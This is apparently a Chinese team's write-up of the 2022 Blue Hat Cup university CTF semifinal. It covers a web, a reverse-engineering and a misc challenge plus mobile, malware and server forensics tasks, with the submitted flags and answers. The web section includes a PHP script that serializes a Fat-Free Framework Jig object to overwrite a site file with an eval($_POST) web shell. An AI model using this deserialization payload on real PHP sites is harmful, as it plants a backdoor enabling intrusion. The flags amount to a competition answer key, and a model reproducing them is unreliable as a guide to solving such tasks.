当前位置:网站首页>第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
2022-08-09 12:29:00 【Pysnow】
总榜38,地区第四: )
文章目录
CTF
web
easyfatfree:
www.zip 下载源码,这又是一道原题,wmctf2020 那个 rce 链子能用,但是因为 disable_fucntion 禁用得太狠了,代码执行也没什么办法,可以直接用 2020ciscn 拿到 easyunserialze 的写文件链子,(没有写文件的权限但是有覆盖文件的权限) 覆盖任意一个 php 文件,然后蚁剑连上就可以拿到 flag 了,因为蚁剑自带绕过 open_basir 的功能,给出 exp 如下https://blog.csdn.net/mochu7777777/article/details/108327699
<?php
namespace DB;
//! In-memory/flat-file DB wrapper
class Jig {
//@{ Storage formats
const
FORMAT_JSON=0,
FORMAT_Serialized=1;
//@}
protected
//! Storage location
$dir = '/var/www/html/',
//! Current storage format
$format = 'self::FORMAT_JSON',
//! Memory-held data
$data = array('lib/utf.php'=>array("a'=>'<?php eval(\$_POST['p']); ?>")),
//! lazy load/save files
$lazy = TRUE;
/** * Read data from memory/file * @return array * @param $file string **/
}
$jig = new jig();
echo urlencode(serialize($jig));
re
babynim
** 大数相除** **
除数
56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471被除数
**51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
a = 56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471
b = 51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
print(b//a)
flag{923973256239481267349126498121231231}
misc
神秘的日志
日志搜索 NTLM,发现有两个有两个时间点**
2022/4/17 11:27:06
2022/4/16 17:31:01
**在 security 日志中找到那个时间点的 NTLM,有五个,导出如下
一个一个 flag 试,发现最后一个 flag 提交正确**
**
flag:flag{dafd0428f634aefd1ddb26f8257c791f}
取证
手机取证_1
** iPhone 手机的 iBoot 固件版本号:(答案参考格式:iBoot-1.1.1)** **
用盘古石手机取证系统导入 iPhone 文件夹,查看设备信息,找到 iBoot 固件版本号。
**flag:iBoot-7429.62.1
exe 分析_1
将程序拖进微步云沙箱,可以看到启动进程位置
C:\Program Files\Common Files\Services\WmiApSvr.exe
exe 分析_2
拖进 ida 就可以看到导入 dll
答案是:是
exe 分析_3
用 x32dbg 调试程序
查看进程的详细信息就可以找到程序名
exe 分析_4
在微步云沙箱搜索文件的哈希值即文件名
挖矿程序
exe 分析_5
在虚拟机运行起来,通过 wireshark 看到一个 ip,查询位置
韩国
APK 分析_01
** 受害人手机中 exec 的序列号是:(答案参考格式:0xadc)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,模糊搜索 exec,找到应用,导出到桌面。用 jadx-gui 打开 apk,查看证书,找到序列号。
**flag:0x936eacbe07f201df
APK 分析_02
** 受害人手机中 exec 关联服务器地址是:(答案参考格式:asd.as.d)** **
** 使用 Jadx 分析 apk,首先看 MainActivity 主函数,发现有一个 Base64 加密后的密文,解密后得到明文: https://ansjk.ecxeio.xyz
** 分析代码发现这个加密算法是在 t( ) 方法里的,查找 t( ) 方法哪里被引用了,发现没有引用的地方,只能换个思路。t( ) 方法所在的 MainActivity 类继承 h 类,分析 h 类。** **
** 发现 t( ) 方法在 h 类中是一个抽象方法(没有方法体,只有声明。抽象方法的具体的实现在子类中,即 MainActivity 类里),随后又发现 loadUrl( ) 方法调用了 t( ) 方法。 **
**
** 说明 loadUrl( ) 加载了 t( ) 里的 https://ansjk.ecxeio.xyz,说明程序的服务器地址就是 t() 方法里的网址。
**flag:ansjk.ecxeio.xyz
APK 分析_03
** 受害人手机中 exec 加载服务器的函数是 :(答案参考格式:asda)** **
根据 APK 分析_02 的分析可知:exec 加载服务器的函数应该是:loadUrl( )
**flag:loadUrl
APK 分析_04
** 受害人手机中 exec 的打包 ID 是:(答案参考格式:adb.adb.cn)** **
根据答案参考格式,猜测 ID 是个网址,将文件拖进 AndroidKiller 里查看,搜索.cn,发现一个网址字符串。提交正确。
**flag:W2Anansjy.com.cn
APK 分析_05
** 受害人手机中 exec 的是否有安全检测行为?** **
查找字符串"安全",发现有检测手机 root 的提示,说明有安全检测。
**
flag:是
APK 分析_06
** 受害人手机中 exec 的检测方法的完整路径和方法名是:(答案参考格式:a.a.a())** **
** 找到字符串,所在方法是所在类 h,分析代码结合 MainActivity 主类中的方法,发现 h 类其实就是 MainActivity,程序将它单独拿出来了,MainActivity( ) 通过继承的方式进行调用,h 类实际是一个开发业务逻辑的类。** **
** 既然是开发业务逻辑的类,必然有安全检测的方法,分析代码,发现 onCreate() 方法中有安全检测,并有安全提醒的字符串。着重分析 onCreate() 方法中有安全提醒字符串这一部分。分析发现每一个安全提醒的字符串触发都是通过一个 if 判断,这个 if 判断条件里的方法都是 a 类中的方法,怀疑 a 类就是安全检测的类,跟进 a 类。** **
** 根据 a 类中的方法名,变量名可知,该类就是安全检测的类。 **
**flag:d.a.a.c.a.a()
APK 分析_07
** 受害人手机中 exec 有几个界面:(答案参考格式:2)** **
一个 APK 每创建一个界面(Activity),都要在 AndroidManifest.xml 中注册,查看 AndroidManifest.xml。发现注册了三个 activity,activity-alias 是为 activity 起了个别名,也就是说 com.kmcjrz.bsesai.newActivity 实际指的就是 minmtta.hemjcbm.ahibyws.MainActivity。
**flag:3
APK 分析_08
** 受害人手机中红星 IPA 的包名是:(答案参考格式:a.s.d)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。搜索可知 IPA 是 Apple 程序应用文件 iPhoneApplication 的缩写,简单来说就是 Apple 程序的 APK,实质还是一个压缩包,解压红星.ipa。
**
IPA 文件解压器解压,得到 ayload 文件,打开 Payload 文件,里面有对应的.app 文件,搜索 info.plist 文件,用 plist Editor 查看,搜索 bundle,找到包名。flag:com.dd666.hongxin
APK 分析_09
** 受害人手机中红星 IPA 的 APIKEY 是:(答案参考格式:asd)** **
在 info.plist 文件中,搜索 APIKEY 找到内容。
**flag:d395159c291c627c9d4ff9139bf8f0a700b98732
APK 分析_10
** 受害人手机中红星 IPA 的权限有哪些?** **
在 info.plist 文件中,寻找有关权限内容,发现四个权限申请。
**
flag:相册,定位,摄像头,麦克风
APK 分析_11
** 嫌疑人手机中红星 APK 的服务器地址是:(答案参考格式:ass.a.d:11)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。跟据提示要求寻找服务器网址,搜索字符串:“url”,发现与题目格式相一致的网址。
提交正确。
**flag:www.nansjy.com.cn:8161
APK 分析_12
** 嫌疑人手机中红星 APK 的程序入口是:(答案参考格式:a.v.b.n)** **
用 Android Killer 打开红星.apk,找到红星 APK 的程序入口名。
**
flag:com.example.weisitas526sad.activity.SplashActivity
APK 分析_13
** 嫌疑人手机中分析聊天工具,服务器的登录端口是:(答案参考格式:12)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,打开应用列表,寻找聊天应用,发现应用 BigAnt5 疑似聊天工具。网上搜索可得 BigAnt5 是聊天软件,搜索 BigAnt5 端口号。
**
搜索可得 BigAnt5 端口号为 6661。
flag:6661
服务器取证_05
通过观察我博客的宝塔面板,可以发现宝塔下载的软件存在于两个地方,/www/server 和/www/server/panel/plugin 这两个文件夹下,然后出去那几个不是软件的文件,计算出来如下**
**
linuxsys webshh mysql nginx php phpmyadmin
答案:6
服务器取证_15
计算机取证,搜索关键词你好**
在此基础上搜索 怎么充值找到一个数据库备份文件,然后导出打开它
搜索关键词找到用户名为
**答案:hm688
边栏推荐
猜你喜欢
Intra-group reverse order adjustment of K nodes
8、IDEA提交代码出现: Fetch failed fatal: Could not read from remote repository
又有大厂员工连续加班倒下/ 百度搜狗取消快照/ 马斯克生父不为他骄傲...今日更多新鲜事在此...
内网穿透工具ngrok使用教程
ansible-cmdb friendly display ansible collects host information
腾讯欲成育碧最大股东/ 米哈游招NLP内容生成研究员/ AI发现四千余物种濒临灭绝...今日更多新鲜事在此...
听声辨物,这是AI视觉该干的???|ECCV 2022
中断系统结构及中断控制详解
Simple understanding of ThreadLocal
Flutter入门进阶之旅(二)Hello Flutter
随机推荐
已解决IndentationError: unindent does not match any oute r indentation Level
Flutter入门进阶之旅(六)Layout Widget
Say goodbye to the AI era of hand looms
Simple understanding of ThreadLocal
FFmpeg库在win10上配置使用(不配置libx264)
ABP 6.0.0-rc.1的新特性
Adalvo收购其首个品牌产品Onsolis
史上最猛“员工”,疯狂吐槽亿万富翁老板小扎:那么有钱,还总穿着同样的衣服!...
二叉树的序列化和反序列化
苹果Meta都在冲的Pancake技术,中国VR团队YVR竟抢先交出产品答卷
Win10 compiles the x264 library (there are also generated lib files)
关于Retrofit网络请求URL中含有可变参数的处理
MySQL 原理与优化,Group By 优化 技巧
卷积神经网络表征可视化研究综述(1)
链表噩梦之一?5000多字带你弄清它的来龙去脉
在已打开图片上加水印(文字)
腾讯发布第二代四足机器人Max,梅花桩上完成跳跃、空翻
Flutter entry and advanced tour (6) Layout Widget
工作任务统计
张朝阳对话俞敏洪:一边是手推物理公式,一边是古诗信手拈来